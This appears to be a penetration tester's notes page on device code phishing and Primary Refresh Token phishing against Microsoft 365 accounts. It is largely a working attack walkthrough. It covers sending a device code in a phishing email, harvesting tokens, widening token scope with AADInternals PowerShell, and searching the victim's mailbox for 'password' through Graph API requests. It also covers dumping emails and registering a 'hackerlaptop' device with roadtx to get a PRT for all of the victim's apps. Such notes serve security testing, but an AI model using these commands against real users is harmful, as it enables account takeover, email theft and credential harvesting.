- Microsoft Azure
- Introducing a new phishing technique for compromising Office 365 accounts (AADInternals)
Device code phishing
It relies on a legitimate authentication endpoint that is capable of forwarding the user session token to an attacker. It uses the OAuth 2 Device Code Flow. Device authorization grant is intended for use with input-constrained devices (e.g. smart TV, printers)
- The attacker generates a code from EntraID
/devicecodeendpoint. This code is valid for only 15 minutes. - The attacker sends the device code to the victim in a phishing email.
- The victim opens the legitimate website https://microsoft.com/devicelogin and only need to provide the code.
- The attacker obtains a valid access token (60 minutes) and a refresh token (90 days) from the victim user to a specific client/application (e.g. Teams, Outlook, SharePoint, etc.).
Testing
A device code can be requested through the following endpoint:
https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0The JWT token obtained has a limited scope. Use the refresh token to extend the scope by requesting access to other O365 applications using the well-known application GUID. We simply need to extend the scope to include applications that has the right to query Graph APIs.
Open a PowerShell console:
import-module addinternals
$t = Get-AADIntAccessTokenWithRefreshToken -clientid "d3590ed6-52b3-4102-aeff-aad2292ab01c" -resource "https://graph.microsoft.com" -tenantid "" -refreshtoken "<token>" -savetocache 1 -includerefreshtoken 1
Write-Output $tThe client ID is the one from the O365 application to access. Find list of application IDs:
GET /v1.0/applications HTTP/2
Host: /graph.microsoft.com
Authorization: Bearer <token>| Microsoft 365 client application | Client ID |
|---|---|
| Teams desktop, mobile | 1fec8e78-bce4-4aaf-ab1b-5451cc387264 |
| Teams web | 5e3ce6c0-2b1f-4285-8d4b-75ee78787346 |
| Microsoft 365 web | 4765445b-32c6-49b0-83e6-1d93765276ca |
| Microsoft 365 desktop | 0ec893e0-5785-4de6-99da-4ed124e5296c |
| Microsoft 365 mobile | d3590ed6-52b3-4102-aeff-aad2292ab01c |
| Outlook desktop | d3590ed6-52b3-4102-aeff-aad2292ab01c |
| Outlook web | bc59ab01-8403-45c6-8796-ac3ef710b3e3 |
| Outlook mobile | 27922004-5251-4030-b22d-91ecd9a37ea4 |
The newly extended token gives access to this:
GET /v1.0/me HTTP/2
Host: /graph.microsoft.com
Authorization: Bearer <new token>Read emails remotely:
GET /v1.0/me/messages?$search="body:password" HTTP/2
Host: /graph.microsoft.com
Authorization: Bearer <new token>See also this MsGraphFunzy (GitHub, Charles Hamilton) to dump emails through Microsoft Graph API. The output is an HTML report with all extracted information including the email attachments.
python3 graph_dump.py azure.token body:passwordDynamic device code phishing
Same as the device code phishing, but bypasses the 15 minutes limitation by using a web page with JavaScript or a QR code in the email to display the device code.
Primary Refresh Token (PRT) phishing
Primary Refresh Token (PRT) is similar to TGT in Kerberos. It is a long-lived refresh token used for SSO and joined/registered/hybrid-joined devices. Valid for 14 days. Based on OAuth. Links a user identity to a device identity.
Device code phishing with clientID for Microsoft Authentication Broker.
Testing
Use roadtx (GitHub).
git clone https://github.com/dirkjanm/roadtools.git
cd roadtools/
python3 -m venv /home/kali/roadtools/.venv
/home/kali/roadtools/.venv/bin/pip install -e roadlib/
/home/kali/roadtools/.venv/bin/pip install -e roadtx/
/home/kali/roadtools/.venv/bin/pip install setuptools
# Run roadtx
export PATH="$PATH:/home/kali/roadtools/.venv/bin"
roadtx
# Help
roadtx gettokens --helpWill output a device code.
roadtx gettokens -c <client-id> -r https://enrollment.manage.microsoft.com/ --device-codeKeep roadtx running. The victim goes to https://microsoft.com/devicelogin and enters the device code (from roadtx) provided in phishing email. roadtx will receive the tokens (access token + refresh token) and write them to a file “.roadtools_auth”.
cat .roadtools_authUse refresh token to Device Registration token
roadtx refreshtokento -r drsRegister the attacker’s device. Generates “<device name>.key” and “<device name>.pem”.
roadtx device -a register -n hackerlaptopObtain the Primary Refresh Token (PRT) to access all applications that the user has access to. Will output the PRT token and save PRT to file “roadtx.prt”.
roadtx prt --refresh-token file -c hackerlaptop.pem -k hackerlaptop.keyCan now use roadtx and Selenium to access all apps (e.g. Outlook, Teams, Azure Portal, etc.) with the PRT as the victim.
Roadtx
roadtx gettokens -u username -p password